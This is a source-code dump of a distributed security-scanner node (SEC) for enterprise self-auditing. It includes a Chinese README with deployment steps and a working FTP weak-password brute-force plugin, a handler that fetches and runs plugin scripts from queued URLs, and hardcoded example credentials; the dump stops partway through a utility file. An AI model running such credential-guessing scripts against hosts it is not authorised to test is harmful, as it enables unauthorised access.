├── Dockerfile ├── Factories ├── DictFactory.py ├── __init__.py └── readme.md ├── HeartBeatHandler.py ├── Models ├── ExceptionResult.py ├── TaskModel.py ├── heartmodel.py ├── readme.md └── taskresultmodel.py ├── README.MD ├── ScanHandler.py ├── ScanHandler_old.py ├── ScanResult.py ├── TaskStatus.py ├── Utils ├── HeartMessage.py ├── TimeUtil.py ├── mylog.py └── readme.md ├── VulRun.py ├── config.py ├── helpers ├── __init__.py ├── filehelper.py ├── readme.md └── redishelper.py ├── logger.conf ├── logs └── readme.md ├── main.py ├── mlogging ├── __init__.py └── readme.md ├── node_run.sh ├── pipmanage.py ├── recovermq.py ├── requirements.txt ├── scan.py ├── scripts ├── Docker远程无密码调用[2375]_f64908f5-46df-4c37-9809-3f6c03a5df0a.py ├── FTP弱口令扫描[21]_8bddf610-6580-4ece-a96e-d7f5eebe5e94.py ├── Java反序列化代码执行[8080]_fc328c6f-a103-4152-8660-de9f2e195911.py ├── Redis弱口令扫描[6379]_44da507f-5141-425b-b565-651f53eadfdc.py ├── SSH弱口令扫描[22]_49145b74-a221-4a41-baf0-03b2351e4634.py ├── WebServer任意文件读取[80]_c04faae4-33b6-45be-bb7c-6cace5d5d4eb.py ├── dockerdemo.py ├── fastcgi目录读取_14e0818f-cafd-4fc4-a984-260aa0016765.py ├── ftpweakscan.py └── readme.md └── test.py /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-alpine 2 | MAINTAINER yourname youremai@mail.com 3 | RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.aliyun.com/g' /etc/apk/repositories 4 | RUN apk add make gcc musl-dev libffi-dev openssl-dev git vim 5 | # 设置时区为上海 6 | RUN apk add tzdata && cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime \ 7 | && echo "Asia/Shanghai" > /etc/timezone 8 | RUN mkdir /xn-secnode && mkdir /xn-secnode/logs && rm -rf /xn-secnode/* 9 | WORKDIR /xn-secnode 10 | LABEL ver=1.5.1 11 | RUN git clone https://github.com/sec-scannode.git /xn-secnode/ 12 | RUN pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 13 | RUN echo "* * * * * root find /xn-secnode/logs -name 'xnsec.log*' -and -mtime +10 -type f |xargs rm -f" 
>>/etc/crontabs/root 14 | RUN chmod a+x /xn-secnode/node_run.sh 15 | 16 | ENV REDIS_ENV=0:pass811220@localhost:6379 17 | ENV HEART_RATE=60 18 | 19 | CMD ["sh","-c", "/xn-secnode/node_run.sh"] 20 | 21 | -------------------------------------------------------------------------------- /Factories/DictFactory.py: -------------------------------------------------------------------------------- 1 | import json 2 | from collections import Iterable 3 | 4 | class BaseParser: 5 | def __init__(self, type:str, sep:str, info:str): 6 | self.type = type 7 | self.sep = sep 8 | self.info = info 9 | 10 | def get_dict(self): 11 | return [] 12 | 13 | 14 | class DictFactory: 15 | @staticmethod 16 | def get_parser(json_obj) -> BaseParser: 17 | type = json_obj['type'] 18 | sep = '' 19 | if 'separate' in json_obj: 20 | sep = json_obj['separate'] 21 | info = json_obj['info'] 22 | ob = None 23 | if type == 'text': 24 | ob = TextParser(type,sep,info) 25 | elif type == 'separate': 26 | ob = SplitParser(type,sep,info) 27 | elif type == 'json': 28 | ob = JosnParser(type,sep,info) 29 | else: 30 | ob = BaseParser(type, sep, info) 31 | return ob 32 | 33 | 34 | class TextParser(BaseParser): 35 | def get_dict(self): 36 | return self.info 37 | 38 | 39 | class SplitParser(BaseParser): 40 | def get_dict(self): 41 | tmpdict = self.info.split(self.sep) 42 | return list(filter(None, tmpdict)) 43 | 44 | 45 | class JosnParser(BaseParser): 46 | def get_dict(self): 47 | obj = json.loads(self.info, encoding='utf-8') 48 | return obj 49 | 50 | if __name__ == "__main__": 51 | tmp = {} 52 | tmp["key1"] = "123" 53 | if '123' in tmp: 54 | print("yes k") 55 | if 'key1' in tmp: 56 | print("yes keys") -------------------------------------------------------------------------------- /Factories/__init__.py: -------------------------------------------------------------------------------- 1 | from Factories.DictFactory import DictFactory 2 | from Factories.DictFactory import BaseParser 
-------------------------------------------------------------------------------- /Factories/readme.md: -------------------------------------------------------------------------------- 1 | some factory module 2 | -------------------------------------------------------------------------------- /HeartBeatHandler.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, sys 3 | from config import myconfig 4 | from Utils import HeartMessage 5 | import json, traceback 6 | import time 7 | from helpers import redishelper 8 | from Utils import mylog 9 | log = mylog.Log().getInstance() 10 | 11 | 12 | def HeartMonitor(): 13 | while True: 14 | try: 15 | __sendheartmessage() 16 | except Exception as err: 17 | print('send heart failed. detail - ', err) 18 | time.sleep(myconfig['default'].HEART_RATE) 19 | 20 | 21 | def __sendheartmessage(info=''): 22 | """ 给心跳订阅者发送redis消息 """ 23 | heart_msg = json.dumps(obj=HeartMessage.getbody(info=info).__dict__, ensure_ascii=False) 24 | redishelper.send_heart(heart_msg, myconfig['default'].MQ_HEART_EXCHANGE) 25 | 26 | 27 | def __sendheartmessage_mq(info=''): 28 | """ 给心跳订阅者发送订阅消息 """ 29 | credentials = pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 30 | connection = pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 31 | port=myconfig['default'].MQ_PORT, 32 | credentials=credentials)) 33 | channel = connection.channel() 34 | # 声明exchange,由exchange指定消息在哪个队列传递,如不存在,则创建。durable = True 代表exchange持久化存储,False 非持久化存储 35 | channel.exchange_declare(exchange=myconfig['default'].MQ_HEART_EXCHANGE, durable=True, exchange_type="fanout") 36 | # 向队列插入数值 routing_key是队列名。delivery_mode = 2 声明消息在队列中持久化,delivery_mod = 1 消息非持久化。routing_key 不需要配置 37 | 38 | channel.basic_publish(exchange=myconfig['default'].MQ_HEART_EXCHANGE, routing_key='', 39 | body=json.dumps(obj=HeartMessage.getbody(info=info).__dict__, ensure_ascii=False), 40 | 
properties=pika.BasicProperties(delivery_mode=2)) 41 | 42 | # log.info("send heart message success.") 43 | # print('heart:',json.dumps(obj=HeartMessage.getbody().__dict__, ensure_ascii=False)) 44 | connection.close() 45 | 46 | 47 | if __name__ == "__main__": 48 | # HeartMonitor() 49 | __sendheartmessage() 50 | -------------------------------------------------------------------------------- /Models/ExceptionResult.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | """ 发送到MQ失败的消息体列表,会被重试 """ 4 | failed_list = set() -------------------------------------------------------------------------------- /Models/TaskModel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class TaskModel: 5 | def __init__(self, server, timespan, active): 6 | self.server = server 7 | self.timespan = timespan 8 | self.active = active 9 | -------------------------------------------------------------------------------- /Models/heartmodel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class HeartModel: 5 | def __init__(self, server, timespan, active, info): 6 | self.server = server 7 | self.timespan = timespan 8 | self.active = active 9 | self.info = info 10 | -------------------------------------------------------------------------------- /Models/readme.md: -------------------------------------------------------------------------------- 1 | some models 2 | -------------------------------------------------------------------------------- /Models/taskresultmodel.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | 4 | class TaskResultModel: 5 | def __init__(self, taskid, taskstatus, scriptstatus, result, tasktime, node=''): 6 | self.taskid = taskid 7 | self.taskstatus = taskstatus 8 | self.scriptstatus = scriptstatus 9 | self.result = result 10 | 
self.tasktime = tasktime 11 | self.node = node 12 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 | # SEC-分布式资产安全扫描(弱口令、系统漏洞、WEB漏洞扫描) 2 | ---------- 3 | **SEC (SEC Is Elastic Controller)** 可用于企业对服务器资源安全进行扫描排查,可控性强、可停止运行中的扫描任务、支持分布式多节点部署,更快的扫描进度 + 节点执行信息动态反馈,快速定位漏洞。 4 | 5 | 作者开源此应用的目的是为了方便企业管理自身的服务器资产,提高安全性,以避免不必要的损失;同时也能与大家一起探讨学习,请使用者不要用于非法目的,自觉遵守 [**《中华人民共和国网络安全法》**](http://www.cac.gov.cn/2016-11/07/c_1119867116.htm) ,一起为祖国的网络安全做贡献。 6 | 7 | ---------- 8 | 9 | ## 流程演示视频 10 | 11 | [![](https://smallcham.github.io/static/img/sec-demo.png)](https://smallcham.github.io/static/video/sec-demo.mp4) 12 | 13 | ---------- 14 | ## 系统组成介绍 15 | 16 | SEC共分为三个项目 17 | * [前端WEB项目](https://github.com/smallcham/sec-admin-web.git) 18 | * [中央控制系统](https://github.com/smallcham/sec-admin.git) 19 | * [任务执行系统](https://github.com/wanzywang/sec-scannode.git) 20 | 21 | > **前端WEB系统** 22 | 使用动静分离的方式部署, WEB页面部分使用 Vue + ElementUI 编写,所有的UI都在这个项目中。 23 | 24 | > **中央控制系统** 25 | 使用Python3 + Flask编写,负责录入资产的端口服务发现、任务执行统计、资产管理、数据字典、漏洞插件管理、用户管理、扫描任务下发以及同步等后台实现,添加的IP会立即进行端口服务以及系统探测。 26 | 27 | > **任务执行系统** 28 | 使用Python3编写,负责处理执行下发的扫描任务,并回馈处理结果。 29 | 执行系统以进程为执行单位,可在同一台机器部署多个进程服务,**支持多节点分布式部署**。 30 | 31 | ## 部署方式(共有三种部署方式) 32 | 33 | ### 一、 一键部署 34 | 35 | 一键部署已经将所有服务以及启动脚本打包成docker镜像, 可以直接运行,数据库以及相关公用服务直接打包在容器内部,不支持分布式节点扩展,可作为体验测试,**不建议直接作为生产环境使用**。 36 | 1. 首先需要安装Docker服务,Ubuntu可使用以下指令直接安装(**已经安装Docker服务并启动的直接调到第 3 步**) 37 | 38 | Ubuntu: 39 | ``` 40 | sudo apt-get -y install docker.io 41 | ``` 42 | 43 | CentOS: 44 | ``` 45 | sudo yum -y install docker.io 46 | ``` 47 | 2. 启动Docker服务(**已经安装Docker服务并启动的直接调到第 3 步**) 48 | 49 | ``` 50 | sudo service docker start 51 | ``` 52 | 53 | 3. 
启动SEC服务(**指令中8793是后台访问端口, 可根据需求修改为其他端口,NODE_COUNT 为执行节点启动的进程数,默认为3**) 54 | 55 | ``` 56 | docker run -d -p 8793:80 --name sec --env NODE_COUNT=3 smallcham/sec:all-in-0.1 && docker logs -f sec --tail 10 57 | ``` 58 | 59 | 4. 服务启动后初始用户为:root, 初始密码将会打印在控制台,可在登录后修改。 60 | 61 | ### 二、使用容器分布式部署(推荐) 62 | 63 | 1. 首先需要安装Docker服务,Ubuntu可使用以下指令直接安装(**已经安装Docker服务并启动的直接调到第 3 步**) 64 | 65 | Ubuntu: 66 | ``` 67 | sudo apt-get -y install docker.io 68 | ``` 69 | 70 | CentOS: 71 | ``` 72 | sudo yum -y install docker.io 73 | ``` 74 | 75 | 2. 启动Docker服务(**已经安装Docker服务并启动的直接调到第 3 步**) 76 | 77 | ``` 78 | sudo service docker start 79 | ``` 80 | 81 | 3. 使用容器启动并初始化MySQL数据库 82 | 83 | ``` 84 | docker run --name sec-mysql -p 3306:3306 -e MYSQL_ROOT_PASSWORD=secpassword -d mysql:5.7 85 | ``` 86 | 87 | ``` 88 | wget https://raw.githubusercontent.com/smallcham/sec-admin/master/pack/create_db.sql 89 | ``` 90 | 91 | 等待半分钟,mysql启动完毕后执行 92 | 93 | ``` 94 | docker exec -i sec-mysql sh -c 'exec mysql -uroot -p"$MYSQL_ROOT_PASSWORD"' < /你下载的目录/create_db.sql 95 | ``` 96 | 97 | > 如果你要使用自己现有的数据库可以直接将[create_db.sql](https://github.com/smallcham/sec-admin/blob/master/pack/create_db.sql)中的SQL执行进行初始化 98 | 99 | 4. 使用容器启动Redis 100 | 101 | ``` 102 | docker run -p 6379:6379 --name sec-redis -d redis 103 | ``` 104 | 105 | > 你也可以使用自己现有的Redis 106 | 107 | 5. 
使用容器启动SEC控制系统 108 | 109 | ``` 110 | docker run -d -p 启动端口:80 --name sec --env HOST=http://部署机器的IP:启动端口(启动后用这个URL在浏览器访问) --env DB_URL=MySQL用户名:MySQL密码@MySQLIP:数据库端口(一默认是3306)/sec --RDS_URL=Redis库号(默认写0):Redis密码(没有密码可以不写)@RedisIP:Redis端口(默认是6379) -v ~/sec-script:/var/www/html/sec-admin/static/plugin/usr smallcham/sec:core-0.1 && docker logs -f sec --tail 10 111 | ``` 112 | 113 | > 例如 114 | 115 | ``` 116 | docker run -d -p 8793:80 --name sec --env HOST=http://192.168.0.107:8793 --env DB_URL=root:abcd1234@192.168.0.107:3306/sec --env RDS_URL=0:abcd1234@192.168.0.107:6379 -v ~/sec-script:/var/www/html/sec-admin/static/plugin/usr smallcham/sec:core-0.1 && docker logs -f sec --tail 10 117 | ``` 118 | 119 | 120 | 6. 登录SEC管理系统 121 | 使用节点添加功能生成并拷贝到终端执行节点安装指令,节点支持分布式,只要保证部署服务器与控制系统以及Redis之间互通即可,当然也可以直接在同一台服务器部署,详细操作请查看[演示视频](https://smallcham.github.io/static/video/sec-demo.mp4) 122 | 123 | ### 三、不使用容器本地部署(以下示例基于Ubuntu) 124 | 125 | 1. 安装MySQL、Redis、Nodejs、npm、Nginx、Python3、pip3 126 | 各种类的系统内的安装方法都大同小异, 这里就不作详细介绍。 127 | 2. 编译Web页面项目 128 | ``` 129 | * git clone https://github.com/smallcham/sec-admin-web.git 130 | * cd 你的项目路径/sec-admin-web/ 131 | * npm install 132 | * npm run build 133 | * ln -s 你的项目路径/sec-admin-web/dist 你的Nginx网站目录/ 134 | ``` 135 | 编译好的静态文件在项目的 dist 目录 136 | 3. 运行SEC核心控制系统 137 | ``` 138 | * git clone https://github.com/smallcham/sec-admin.git 139 | * cd 你的项目路径/sec-admin/ 140 | * pip install -r requirements.txt // 找不到pip的尝试 pip3 install -r requirements.txt 141 | * 打开项目路径下的 src/model/enum.py 修改Env类 默认LOCAL判断内的数据库以及Redis配置为你安装的配置 142 | * nohup gunicorn -w 10 app:flask_app 143 | ``` 144 | 4. 
配置Nginx访问 145 | > 以下配置模板供参考,端口或者目录不一样请自行修改。 146 | 147 | ``` 148 | server { 149 | listen 80 default_server; 150 | listen [::]:80 default_server; 151 | 152 | root /var/www/html; 153 | 154 | index index.html index.htm; 155 | 156 | server_name _; 157 | 158 | location / { 159 | root /var/www/html/dist; 160 | try_files $uri $uri/ 404; 161 | } 162 | 163 | location /api/ { 164 | proxy_pass http://localhost:8000/; 165 | } 166 | 167 | location /static/plugin/usr/ { 168 | proxy_pass http://localhost:8000; 169 | } 170 | } 171 | ``` 172 | 配置好后记得重启nginx服务 173 | 5. 启动执行节点 174 | ``` 175 | * git clone https://github.com/wanzywang/sec-scannode.git 176 | * cd 你的项目路径/sec-scannode/ 177 | * pip install -r requirements.txt // 找不到pip的尝试 pip3 install -r requirements.txt 178 | * 打开项目根目录的 config.py 修改redis配置为你安装的ip以及密码 179 | * python -u scan.py 180 | ``` 181 | 182 | ## 功能介绍 183 | 184 | ### 插件说明 185 | 186 | SEC支持添加自定义扫描插件脚本,目前仅支持Python语言,格式如下。 187 | ``` 188 | //target参数为扫描目标, 可以是IP也可以是域名,具体取决于资产录入的是ip还是域名 189 | def do(target): 190 | if 发现漏洞: 191 | return True, '发现漏洞,原因***' 192 | else: 193 | return False, '' 194 | ``` 195 | 196 | 可参考以下FTP弱口令扫描脚本 197 | 其中 SEC_USER_NAME、SEC_PASSWORD 为字典功能中录入的Key值,扫描节点会自动将数据字典中添加的内容以设置的分隔符或JSON格式转化为数组或字典,可以通过字典Key值直接引入使用。 198 | 199 | ``` 200 | from ftplib import FTP 201 | 202 | def do(target): 203 | port = 21 204 | time_out_flag = 0 205 | for user in SEC_USER_NAME: 206 | print(user) 207 | for pwd in SEC_PASSWORD: 208 | print(pwd) 209 | try: 210 | ftp = FTP(target, timeout=3) 211 | ftp.connect(target, port, 5) 212 | if ftp.login(user, pwd).startswith('2'): 213 | return True, '用户: ' + user + ' 存在弱口令: ' + pwd 214 | except Exception as e: 215 | if not str(e).startswith('530'): 216 | print(e) 217 | if e.args[0] == 113 or e.args[0] == 111 or 'timed out' in str(e): 218 | time_out_flag += 1 219 | if time_out_flag > 2: 220 | print('connection timeout , break the loop .') 221 | return False, '' 222 | else: 223 | print(e) 224 | return False, '' 225 | ``` 226 | 227 | ------ 
228 | 229 | # docker run -h 可以设置hostname 230 | #使用帮助 231 | ### buildzip.sh 可以生成代码的zip包 232 | ### docker build -t xn-secnode . 233 | ### docker run -d -h slavenode-1 --env MQ_ENV=**** xn-secnode 234 | 235 | 236 | #打包需要同时更新dockerfile和 build.sh的版本号 -------------------------------------------------------------------------------- /ScanHandler.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, json, datetime, traceback,os, requests, sys, multiprocessing,socket 3 | import pika.exceptions, time 4 | import ScanResult 5 | from Models import TaskModel, taskresultmodel 6 | from Utils import TimeUtil 7 | from config import myconfig 8 | from Utils import mylog 9 | from helpers import redishelper 10 | import VulRun 11 | log = mylog.Log().getInstance() 12 | 13 | 14 | """ 15 | 从待扫描队列读取扫描任务,进行扫描 16 | 改成了redis读取任务 17 | """ 18 | 19 | 20 | def receive(): 21 | log.info("receive......") 22 | while True: 23 | try: 24 | task = redishelper.getonetask() 25 | taskid = task['id'] 26 | plugin_url = task['url'] 27 | module_name = task['name'] 28 | ip = task['ip'] 29 | 30 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name + '.py')): 31 | try: 32 | r = requests.get(plugin_url, timeout=10) 33 | if r.status_code == 200: 34 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), 35 | "wb") as f: 36 | f.write(r.content) 37 | else: 38 | log.error("下载脚本失败:{}".format(r)) 39 | ScanResult.sendmsg(taskid, "FAIL", False, "下载脚本失败:{}".format(r), node=socket.gethostname()) 40 | continue 41 | except Exception as re: 42 | log.error("收取消息后,处理失败:{},\ndetail-{}".format(re, traceback.format_exc())) 43 | ScanResult.sendmsg(taskid, "FAIL", False, "下载脚本失败:{}".format(re), node=socket.gethostname()) 44 | continue 45 | 46 | ScanResult.sendmsg(taskid, "RUNNING", False, "", node=socket.gethostname()) 47 | # 返回running 48 | run_proc = 
multiprocessing.Process(target=vul_handler, args=(module_name, ip, taskid)) 49 | run_proc.start() 50 | # 等待结束 51 | while True: 52 | run_proc.join(timeout=60) 53 | if run_proc.is_alive(): 54 | if redishelper.needstop(taskid): 55 | log.info("has task cancle event. {}".format(taskid)) 56 | run_proc.terminate() 57 | run_proc.join() 58 | log.info("{} : task cancel........") 59 | ScanResult.sendmsg(taskid, "CANCEL", False, "",socket.gethostname()) 60 | else: 61 | log.info("不需要提前结束,继续等待检查完成......") 62 | continue 63 | else: 64 | break 65 | except Exception as err: 66 | log.error("task basic_consume error:", traceback.format_exc()) 67 | ScanResult.sendmsg(taskid, "FAIL", False, str(err), socket.gethostname()) 68 | time.sleep(30) 69 | 70 | 71 | def vul_handler(module, ip, taskid): 72 | log.info(" start " + module + " ") 73 | # 准备进入实际脚本开始检查 74 | task_suc, scan_status, scan_result = VulRun.check(module, ip) 75 | log.info("end {}, {}, {}".format(module, ip, " scan...")) 76 | if task_suc: 77 | task_suc = "FINISH" 78 | else: 79 | task_suc = "FAIL" 80 | ScanResult.sendmsg(taskid, task_suc, scan_status, scan_result,socket.gethostname()) 81 | 82 | 83 | def rec_callback(ch, method, prop, body): 84 | try: 85 | taskid = "unknown" 86 | scan_status = False # 脚本检查是否认为有异常 True= 有异常 87 | task_suc = False # 任务执行是否有异常 88 | body_msg = body.decode() 89 | log.info("receive task: ", body) 90 | 91 | msg = json.loads(body_msg, encoding='utf-8') 92 | taskid = msg['id'] 93 | plugin_url = msg['url'] 94 | module_name = msg['name'] 95 | ip = msg['ip'] 96 | 97 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name+'.py')): 98 | r = requests.get(plugin_url) 99 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), "wb") as f: 100 | f.write(r.content) 101 | # 准备进入实际脚本开始检查 102 | task_suc, scan_status, scan_result = VulRun.check(module_name, ip) 103 | print("end to ", module_name, " scan...") 104 | except Exception as err: 105 | 
print('receive deal failed. ', err) 106 | task_suc = False 107 | scan_result = "执行失败," + str(err) 108 | 109 | ch.basic_ack(delivery_tag=method.delivery_tag) 110 | if task_suc: 111 | task_suc = "FINISH" 112 | else: 113 | task_suc = "FAIL" 114 | # 准备返回json模型 115 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=task_suc, scriptstatus=scan_status, 116 | result=scan_result, 117 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 118 | node=socket.gethostname()) 119 | # 给结果队列发送消息 120 | ScanResult.sendtorabbitmq(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 121 | 122 | 123 | def scanmonitor(): 124 | """ 监听扫描队列 """ 125 | try: 126 | receive() 127 | except Exception as err: 128 | print("listen scan task failed. ", err) 129 | 130 | 131 | if __name__ == "__main__": 132 | log.info(("{}".format(b'asfasasf'))) 133 | res = requests.get("https://www.baidu.com") 134 | log.info("{}".format(res)) 135 | # p = multiprocessing.Process(target=test) 136 | # p.start() 137 | # receive() 138 | # time.sleep(60) 139 | # r = requests.get("http://localhost/test.py") 140 | # with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', "test" + ".py"), "wb") as f: 141 | # f.write(r.content) 142 | #print(os.path.join(os.path.abspath(__file__), 'scripts', "module_name" + '.py')) 143 | # receive() 144 | -------------------------------------------------------------------------------- /ScanHandler_old.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, json, datetime, traceback,os, requests, sys,socket 3 | import pika.exceptions 4 | import ScanResult 5 | from Models import TaskModel, taskresultmodel 6 | from Utils import TimeUtil 7 | from config import myconfig 8 | from Utils import mylog 9 | import VulRun 10 | log = mylog.Log().getInstance() 11 | 12 | """ 从待扫描队列读取扫描任务,进行扫描 """ 13 | 14 | 15 | def receive(): 16 | while True: 17 | try: 18 | credentials = 
pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 19 | connect = pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 20 | port=myconfig['default'].MQ_PORT, 21 | credentials=credentials, 22 | heartbeat=0)) 23 | ch = connect.channel() 24 | ch.basic_qos(prefetch_count=1) 25 | ch.queue_declare(myconfig['default'].MQ_URL, durable=True) 26 | try: 27 | ch.basic_consume(queue=myconfig['default'].MQ_SCAN_QUEUE, on_message_callback=rec_callback, 28 | auto_ack=False) 29 | log.info("task listening rabbitmq..") 30 | ch.start_consuming() 31 | except pika.exceptions.ChannelClosedByBroker as err: 32 | log.error("listen mq failed,", traceback.format_exc()) 33 | finally: 34 | ch.close() 35 | connect.close() 36 | except Exception as err: 37 | log.error("task basic_consume error:", traceback.format_exc()) 38 | 39 | 40 | def rec_callback(ch, method, prop, body): 41 | try: 42 | taskid = "unknown" 43 | scan_status = False # 脚本检查是否认为有异常 True= 有异常 44 | task_suc = False # 任务执行是否有异常 45 | body_msg = body.decode() 46 | log.info("receive task: ", body) 47 | 48 | msg = json.loads(body_msg, encoding='utf-8') 49 | taskid = msg['id'] 50 | plugin_url = msg['url'] 51 | module_name = msg['name'] 52 | ip = msg['ip'] 53 | 54 | if not os.path.exists(os.path.join(os.path.abspath(__file__), 'scripts', module_name+'.py')): 55 | r = requests.get(plugin_url) 56 | with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', module_name + ".py"), "wb") as f: 57 | f.write(r.content) 58 | # 准备进入实际脚本开始检查 59 | task_suc, scan_status, scan_result = VulRun.check(module_name, ip) 60 | print("end to ", module_name, " scan...") 61 | except Exception as err: 62 | print('receive deal failed. 
', err) 63 | task_suc = False 64 | scan_result = "执行失败," + str(err) 65 | 66 | ch.basic_ack(delivery_tag=method.delivery_tag) 67 | if task_suc: 68 | task_suc = "FINISH" 69 | else: 70 | task_suc = "FAIL" 71 | # 准备返回json模型 72 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=task_suc, scriptstatus=scan_status, 73 | result=scan_result, 74 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 75 | node=socket.gethostname()) 76 | # 给结果队列发送消息 77 | ScanResult.sendtorabbitmq(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 78 | 79 | 80 | def scanmonitor(): 81 | """ 监听扫描队列 """ 82 | try: 83 | receive() 84 | except Exception as err: 85 | print("listen scan task failed. ", err) 86 | 87 | 88 | if __name__ == "__main__": 89 | log.info("hahah",b'sdfsdf') 90 | # r = requests.get("http://localhost/test.py") 91 | # with open(os.path.join(os.path.dirname(os.path.abspath("__file__")), 'scripts', "test" + ".py"), "wb") as f: 92 | # f.write(r.content) 93 | #print(os.path.join(os.path.abspath(__file__), 'scripts', "module_name" + '.py')) 94 | # receive() 95 | -------------------------------------------------------------------------------- /ScanResult.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import pika, traceback, json, datetime 3 | from config import myconfig 4 | from Models import ExceptionResult 5 | from Utils import mylog 6 | from Models import taskresultmodel 7 | from Utils import TimeUtil 8 | from helpers import redishelper 9 | log = mylog.Log().getInstance() 10 | 11 | 12 | def sendtoredis(body): 13 | if not redishelper.send_result(body, myconfig['default'].MQ_RESULT_EXCHANGE): 14 | ExceptionResult.failed_list.add(body) 15 | 16 | 17 | def sendtorabbitmq(body): 18 | """给 结果 交换路由 发送消息 """ 19 | try: 20 | credentials = pika.PlainCredentials(myconfig['default'].MQ_USER, myconfig['default'].MQ_PASS) 21 | connection = 
pika.BlockingConnection(pika.ConnectionParameters(host=myconfig['default'].MQ_URL, 22 | port=myconfig['default'].MQ_PORT, 23 | credentials=credentials)) 24 | channel = connection.channel() 25 | # 声明exchange,由exchange指定消息在哪个队列传递,如不存在,则创建。durable = True 代表exchange持久化存储,False 非持久化存储 26 | channel.exchange_declare(exchange=myconfig['default'].MQ_RESULT_EXCHANGE, durable=True, 27 | exchange_type=myconfig['default'].MQ_RESULT_EXCHNAGE_TYPE) 28 | # 向队列插入数值 routing_key是队列名。delivery_mode = 2 声明消息在队列中持久化,delivery_mod = 1 消息非持久化。routing_key 不需要配置 29 | channel.basic_publish(exchange=myconfig['default'].MQ_RESULT_EXCHANGE, routing_key='', 30 | body=body, properties=pika.BasicProperties(delivery_mode=2)) 31 | 32 | log.info("send result msg success. {},{}".format(myconfig['default'].MQ_RESULT_EXCHANGE, body)) 33 | connection.close() 34 | except Exception as err: 35 | log.error("send result failed, {},{}".format(err, traceback.format_exc())) 36 | ExceptionResult.failed_list.add(body) 37 | log.warning("add send failed msg to fail_list, wait retry.") 38 | 39 | 40 | def sendmsg(taskid, taskstatus, scriptstatus, result, node): 41 | rt = taskresultmodel.TaskResultModel(taskid=taskid, taskstatus=taskstatus, scriptstatus=scriptstatus, 42 | result=result, 43 | tasktime=TimeUtil.datetime_to_strtime(datetime.datetime.now()), 44 | node=node) 45 | # 给结果队列发送消息 46 | sendtoredis(json.dumps(obj=rt.__dict__, ensure_ascii=False)) 47 | -------------------------------------------------------------------------------- /TaskStatus.py: -------------------------------------------------------------------------------- 1 | 2 | class TaskStatus: 3 | RUN_ABLE = 'RUN_ABLE' 4 | RUNNING = 'RUNNING' 5 | FINISH = 'FINISH' 6 | FAIL = 'FAIL' 7 | STOP = "STOP" -------------------------------------------------------------------------------- /Utils/HeartMessage.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import datetime 3 | import socket 4 | 5 | from Models 
import heartmodel 6 | from Utils import TimeUtil 7 | from Utils import mylog 8 | log = mylog.Log().getInstance() 9 | 10 | 11 | def getbody(info='') -> heartmodel.HeartModel: 12 | """ 生成心跳消息体 """ 13 | server = socket.gethostname() 14 | local_time, local_strtime, local_timestamp = TimeUtil.current_datetime() 15 | active = True 16 | c = heartmodel.HeartModel(server=server, timespan=str(local_timestamp), active=active, info=info) 17 | return c 18 | -------------------------------------------------------------------------------- /Utils/TimeUtil.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | import time 4 | 5 | from datetime import datetime 6 | 7 | 8 | def timestamp_to_strtime(timestamp): 9 | """将 13 位整数的毫秒时间戳转化成本地普通时间 (字符串格式) 10 | :param timestamp: 13 位整数的毫秒时间戳 (1456402864242) 11 | :return: 返回字符串格式 {str}'2016-02-25 20:21:04.242000' 12 | """ 13 | local_str_time = datetime.fromtimestamp(timestamp / 1000.0).strftime('%Y-%m-%d %H:%M:%S.%f') 14 | return local_str_time 15 | 16 | 17 | def timestamp_to_datetime(timestamp): 18 | """将 13 位整数的毫秒时间戳转化成本地普通时间 (datetime 格式) 19 | :param timestamp: 13 位整数的毫秒时间戳 (1456402864242) 20 | :return: 返回 datetime 格式 {datetime}2016-02-25 20:21:04.242000 21 | """ 22 | local_dt_time = datetime.fromtimestamp(timestamp / 1000.0) 23 | return local_dt_time 24 | 25 | 26 | def datetime_to_strtime(datetime_obj): 27 | """将 datetime 格式的时间 (含毫秒) 转为字符串格式 28 | :param datetime_obj: {datetime}2016-02-25 20:21:04.242000 29 | :return: {str}'2016-02-25 20:21:04.242' 30 | """ 31 | local_str_time = datetime_obj.strftime("%Y-%m-%d %H:%M:%S.%f") 32 | return local_str_time 33 | 34 | 35 | def datetime_to_timestamp(datetime_obj): 36 | """将本地(local) datetime 格式的时间 (含毫秒) 转为毫秒时间戳 37 | :param datetime_obj: {datetime}2016-02-25 20:21:04.242000 38 | :return: 13 位的毫秒时间戳 1456402864242 39 | """ 40 | local_timestamp = int(time.mktime(datetime_obj.timetuple()) * 1000.0 + datetime_obj.microsecond / 1000.0) 41 | 
def strtime_to_datetime(timestr):
    """Parse a local time string (with milliseconds) into a datetime.

